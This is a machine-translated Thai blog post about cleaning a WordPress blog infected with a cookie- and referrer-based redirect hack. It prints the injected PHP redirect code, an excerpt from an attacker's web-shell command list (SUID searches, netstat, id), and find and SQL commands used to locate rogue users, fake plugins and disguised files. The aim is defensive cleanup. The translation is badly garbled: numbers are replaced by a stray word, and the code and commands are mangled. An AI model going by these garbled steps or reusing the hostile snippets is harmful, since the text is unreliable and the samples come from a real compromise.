ไวรัส blogosphere ... แต่ฉันเคยที่?!

ในเดือนที่ผ่านมาผมได้รับการแจ้งเตือน ไวรัสในบล็อก จากผู้เข้าชมบางส่วน ตอนแรกผมไม่สนใจคำเตือนเพราะผมติดตั้งโปรแกรมป้องกันไวรัสที่ดีงาม (Kaspersky AV ฮิต) และเวลามากขึ้นนั่งบนบล็อกที่ฉันไม่เคยได้รับการแจ้งเตือนไวรัส (เดิม .. ผมเห็นอะไรบางอย่างที่น่าสงสัยว่าการฟื้นฟูครั้งแรกหายไป. ต่อไป ... )
ค่อยๆเร​​ิ่มปรากฏให้เห็นรูปแบบขนาดใหญ่ เข้าเยี่ยมชมหลังจากที่อัตราการเข้าชมเมื่อเร็ว ๆ นี้ได้ลดลงอย่างต่อเนื่องและเริ่มมีผู้คนมากขึ้นที่บอกผมว่า stealthsettings.com มันเป็น virused. เมื่อวานนี้ผมได้รับจากคนที่หน้าจอทำเมื่อโปรแกรมป้องกันไวรัสที่ถูกปิดกั้น ต้นฉบับ stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. มันก็สวยเชื่อฉันที่ฉันใส่ค้นหาแหล่งที่มาทั้งหมด ความคิดแรกที่มาถึงใจของฉันคือการทำให้ อัพเกรด รุ่นล่าสุดของ WordPress (2.5.1) แต่ไม่ไฟล์ทั้งหมดก่อนที่จะลบสคริปต์เก่าและทำให้ WordPress ฐานข้อมูลสำรอง. ขั้นตอนนี้จะได้รับการไม่ประสบความสำเร็จและอาจจะต้องใช้เวลานานในการคิดเสมาที่เป็นถูถ้าผมจะได้กล่าวว่า พูดคุยกาแฟเขาพบ Google และมันจะดีที่จะเห็นเขา
MyDigitalLife.info ตีพิมพ์บทความเรื่อง "WordPress สับ: กู้คืนและแก้ไข Google และ Search Engine หรือไม่มีการจราจรคุกกี้เปลี่ยนเส้นทางไปยังคุณ-Needs.info, AnyResults.Net, โกลเด้น-Info.net และเว็บไซต์ที่ผิดกฎหมายอื่น ๆ"นั่นเป็นจุดสิ้นสุดของด้ายที่ฉันต้องการ
มันเป็นเรื่องของ เอาเปรียบ WordPress ขึ้นอยู่กับคุกกี้ซึ่งผมคิดว่ามีความซับซ้อนมากและทำหนังสือเล่มนี้ ฉลาดพอที่จะทำให้ ด้วย SQL Injection บล็อกของฐานข้อมูล, เพื่อสร้างผู้ใช้ที่มองไม่เห็น การตรวจสอบตามปกติธรรมดา แผงควบคุม->ผู้ใช้, ตรวจสอบไดเรกทอรีและไฟล์เซิร์ฟเวอร์ "เขียน" (ซึ่ง chmod ฮิต) ที่จะแสวงหาและ ดำเนินการ ไฟล์ที่มีสิทธิของผู้ใช้รากหรือกลุ่ม ผมไม่ทราบว่าที่ใช้ประโยชน์จากชื่อและที่เห็นว่ามีไม่กี่บทความที่เขียนเกี่ยวกับเขาแม้จะมีความจริงที่ว่าหลายบล็อกที่ติดเชื้อรวมทั้งโรมาเนีย ตกลง ... ฉันจะพยายามที่จะพยายามที่จะอธิบาย generalities เกี่ยวกับไวรัส

ไวรัสคืออะไร

ขั้นแรกให้ใส่แหล่งที่มาของหน้าในบล็อกการเชื่อมโยงกับผู้เข้าชมที่มองไม่เห็น แต่ที่มองเห็นและสามารถจัดทำดัชนีสำหรับเครื่องมือค้นหาโดยเฉพาะอย่างยิ่งของ Google อย่างนี้ เว็บไซต์โอน Page Rank ระบุโดยโจมตี. ประการที่สองถูกแทรก รหัสการเปลี่ยนเส้นทาง URL สำหรับผู้เข้าชมที่มาจาก Google, สด, Yahoo, ... หรืออ่าน RSS และไม่ได้เป็นเว็บไซต์ คุกกี้. โปรแกรมป้องกันไวรัส ตรวจพบการเปลี่ยนเส้นทางเป็น Trojan-Clicker.HTML.

อาการ:

ลดลงมากในการเข้าเยี่ยมชมโดยเฉพาะอย่างยิ่งในบล็อกที่ผู้เข้าชมส่วนใหญ่มาจาก Google

บัตรประจำตัว: (จึงกลายเป็นปัญหาสำหรับผู้ที่ไม่มีเบาะแสเป็นวิธี phpMyAdmin PHP และลินุกซ์)

LA คำเตือน! ก่อนให้ฐานข้อมูลสำรอง!

ฮิต ตรวจสอบไฟล์ที่มา index.php, header.php, footer.php, รูปแบบบล็อกและดูว่ามีรหัสที่ใช้การเข้ารหัส base64 หรือมี "หาก ($ Ser ==" ฮิต && sizeof ($ _COOKIE) == ฮิต?) "รูปแบบ:

<php?
$ Seref = array ("google", "msn ได้", "สด", "altavista"
"ถาม", "yahoo", "เอโอแอล", "ซีเอ็นเอ็น", "สภาพอากาศ", "Alexa");
$ Ser = ฮิต; foreach ($ เป็น $ Seref อ้างอิง)
ถ้า (strpos (strtolower
! ($ _SERVER ['HTTP_REFERER']) $ อ้างอิง) == เท็จ) {$ Ser = "ฮิต; แบ่ง; }
หาก ($ Ser == "ฮิต && sizeof ($ _COOKIE) == ฮิต?) {ส่วนหัว (" สถานที่ตั้ง: ". base1_decode (". http:// YW0cmVzdWx64cy55uZXQ = ') "/"); exit;
}>

หรือสิ่งที่ ... ลบรหัสนี้!

คลิกที่ภาพ ...

รหัสดัชนี

ในภาพด้านบนฉันตั้งใจเลือก "<get_header Php (); > " รหัสที่ควรอยู่

ฮิต การใช้ phpMyAdmin และไปที่ตารางฐานข้อมูล wp_usersสถานที่ที่จะตรวจสอบว่ามีชื่อผู้ใช้ไม่ถูกสร้างใน 00:00:00 0000-00-00 (ที่เป็นไปได้ในด้านการ user_login "WordPress" กล่าวว่า เขียนรหัสผู้ใช้นี้ (เขตข้อมูลหมายเลข) แล้วเช็ด

คลิกที่ภาพ ...

ผู้ใช้ปลอม

* สายสีเขียวจะถูกลบออกและเก็บ ID ของเขา ในกรณีของ เป็น ID = ฮิต .

ฮิต ไปที่ตาราง wp_usermeta, ที่ ตั้งอยู่ และ เอาออก สาย ID ที่เกี่ยวข้อง (ในกรณีที่สนาม user_id ค่า ID ปรากฏลบ)

ฮิต ตาราง wp_optionไปที่ active_plugins และดูว่ามีการใช้งานปลั๊กอินผู้ต้องสงสัย มันสามารถนำมาใช้เช่นตอนจบ _old.giff, _old.pngg, _old.jpeg, _new.php.giffฯลฯ รวมถึงการขยาย _old และภาพปลอม _new

Wp_options SELECT * FROM WHERE option_name = 'active_plugins'

ลบปลั๊กอินนี้แล้วไปที่บล็อก -> กระดาน -> ปลั๊กอินที่ปิดใช้งานและเปิดใช้งานปลั๊กอินบาง

คลิกที่ภาพเพื่อดูว่าไฟล์ไวรัสปรากฏ active_plugins

เสียบเข้าไป

ติดตามเส้นทาง FTP หรือ SSH และลบไฟล์ที่ระบุไว้ในเซิร์ฟเวอร์ active_plugins

5 นอกจากนี้ใน phpMyAdmin ในตาราง wp_option, ค้นหาและลบแถวที่มี "rss_f541b3abd05e7962fcab37737f40fad8"และในหมู่"internal_links_cache ".
ในการเชื่อมโยง internal_links_cache สแปมที่มีการเข้ารหัสที่ปรากฏในบล็อกและ รหัส Google Adsense, ของแฮ็กเกอร์

ฮิต แนะนำคือการ เปลี่ยนรหัสผ่าน บล็อกและเข้าสู่ระบบ ลบทั้งหมด userele ที่น่าสงสัย. อัพเกรดเป็นรุ่นล่าสุดของ WordPress และการตั้งค่าบล็อกที่ไม่อนุญาตให้มีการลงทะเบียนผู้ใช้ใหม่ ไม่มีการสูญเสียก็คือ ... สามารถแสดงความคิดเห็นและไร้เหตุผล

ฉันพยายามที่จะอธิบายไปบ้างว่าจะทำอย่างไรในสถานการณ์ดังกล่าวในการทำความสะอาดบล็อกไวรัสนี้ ปัญหาจะรุนแรงมากขึ้นกว่าดูเหมือนว่าแทบจะไม่แก้ไขและสำหรับการใช้งาน ช่องโหว่ความปลอดภัย โฮสติ้งเว็บเซิร์ฟเวอร์ซึ่งเป็นบล็อก

ในฐานะที่เป็นวัดแรกของการรักษาความปลอดภัยที่มีการเข้าถึง SSH, ให้ตรวจสอบบางอย่างบนเซิร์ฟเวอร์เพื่อดูว่ามีไฟล์เช่น * _old * และ * _new. * ด้วยตอนจบGiff jpeg.. pngg. jpgg. ไฟล์เหล่านี้จะถูกลบออก หากคุณเปลี่ยนชื่อไฟล์ตัวอย่างเช่น top_right_old.giff in top_right_old.phpเราจะเห็นว่าไฟล์ที่ว่าเซิร์ฟเวอร์รหัสใช้ประโยชน์

บางตัวชี้วัดที่มีประโยชน์ในการตรวจสอบการทำความสะอาดและการรักษาความปลอดภัยเซิร์ฟเวอร์ (ผ่านทาง SSH)

1 cd / tmp และตรวจสอบโฟลเดอร์เช่น tmpVFlma หรืออื่น ๆ ที่ชื่อเหมือนกันและลบมัน ดูภาพด้านล่างสองโฟลเดอร์ดังกล่าวเพื่อฉัน:

tmpserver

RM-RF ชื่อโฟลเดอร์

ฮิต ตรวจสอบ elimiati (เปลี่ยน chmod) เป็นคุณลักษณะโฟลเดอร์ที่เป็นไปได้ chmod ฮิต

หาไฟล์ที่สามารถเขียนได้ใน dir ปัจจุบัน หา -Type-f-ดัดฮิตคำสั่ง ls-
หาไดเรกทอรีที่สามารถเขียนได้ใน dir ปัจจุบัน หา -Type-d-ดัดฮิตคำสั่ง ls-
หาไดเรกทอรีที่สามารถเขียนและไฟล์ใน dir ปัจจุบัน หา -Perm-ฮิตคำสั่ง ls-

ฮิต มองหาไฟล์ที่น่าสงสัยบนเซิร์ฟเวอร์

หา -ชื่อ "* _new.php *"
หา -ชื่อ "* _old.php *"
หา -ชื่อ "* Jpgg."
หา -ชื่อ "* _giff"
หา -ชื่อ "* _pngg"

4, คำเตือน! แฟ้มที่ถูกตั้งบิต SUID si SGID. ไฟล์เหล่านี้ดำเนินการด้วยสิทธิของผู้ใช้ (กลุ่ม) หรือรากที่ไม่ได้ใช้ดำเนินการแฟ้ม ไฟล์เหล่านี้สามารถนำไปสู่​​การประนีประนอมรากถ้ามีปัญหาด้านความปลอดภัย ถ้าคุณใช้ไฟล์ที่มีและ SGID บิตดำเนินการ 'chmod ฮิต " หรือถอนการติดตั้งแพคเกจที่มีพวกเขา

มีประโยชน์ในบางส่วนของแหล่งที่มา ...

ถ้า (! $ safe_mode) {
หาก ($ os_type 'ระวัง' ==) {
. $ Os = ดำเนินการ ('sysctl-n kern.ostype');
. $ Os = ดำเนินการ ('sysctl-n kern.osrelease');
. $ Os = ดำเนินการ ('sysctl-n kernel.ostype');
. $ Os = ดำเนินการ ('sysctl-n kernel.osrelease');
ถ้า (ว่างเปล่า ($ ผู้ใช้)) $ ผู้ใช้รัน ('รหัส');
$ นามแฝง = array (
"=>"
'ค้นหาไฟล์ suid' => 'หา / ประเภท F-ดัด-ฮิตคำสั่ง ls-'
'ค้นหาไฟล์ sgid' => 'หา / ประเภท F-ดัด-ฮิตคำสั่ง ls-'
'ค้นหาไฟล์ที่สามารถเขียนได้ในปัจจุบัน dir' => 'หา -Type-f-ดัดฮิตคำสั่ง ls-'
'ค้นหาไดเรกทอรีที่สามารถเขียนได้ในปัจจุบัน dir' => 'หา -Type-d-ดัดฮิตคำสั่ง ls-'
'ค้นหาไดเรกทอรีที่สามารถเขียนและไฟล์ใน dir ปัจจุบัน' => 'หา -Perm-ฮิตคำสั่ง ls-'
'แสดงเปิดพอร์ต' => 'netstat-| grep-i ฟัง'
);
} else {
. $ Os_name = ดำเนินการ ('เวอร์ชั่น');
$ = ผู้ใช้ดำเนินการ ('ก้อง% username%').
$ นามแฝง = array (
"=>"
"แสดง runing บริการ '=>' เริ่มต้นสุทธิ
รายการแสดงกระบวนการ '=>' Tasklist '
);
}

ด้วยวิธีนี้ ... โดยทั่วไปพบว่าการละเมิดในการรักษาความปลอดภัย ไฟล์พอร์ตไดเรกทอรีเปิด "เขียน" และการดำเนินการของกลุ่มสิทธิพิเศษ / ราก

กลับมาพร้อมกับเพิ่มเติม ...

บล็อกบางที่ติดเชื้อ: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /

www.mirabilismedia.ro / blog, Blog.einvest.ro
... รายการไปใน ... มาก

คุณสามารถตรวจสอบว่าบล็อกเป็นไวรัสโดยใช้เครื่องมือค้นหา คัดลอกและวาง:

เว็บไซต์: www.blegoo.com ซื้อ

คืนที่ดีและการเพิ่มขึ้นในการทำงาน ;) เร็ว ๆ นี้ผมจะมาให้ข่าวเกี่ยวกับยูจีน prevezibil.imprevizibil.com.

BRB :)

LA: คำเตือน! การเปลี่ยนรูปแบบ WordPress หรืออัพเกรด WordPress ฮิต, ไม่แก้ปัญหาที่จะกำจัดไวรัสนี้

ไวรัส blogosphere ... แต่ฉันเคยที่?!

เกี่ยวกับผู้เขียน

ชิงทรัพย์

หลงใหลเกี่ยวกับทุกอย่างที่แกดเจ็ตและไอทีเขียนยินดี stealthsettings.com ของ 2006 และผมชอบที่จะค้นพบสิ่งใหม่ ๆ กับคุณเกี่ยวกับคอมพิวเตอร์และ MacOS, Linux, Windows, iOS และ Android

แสดงความคิดเห็น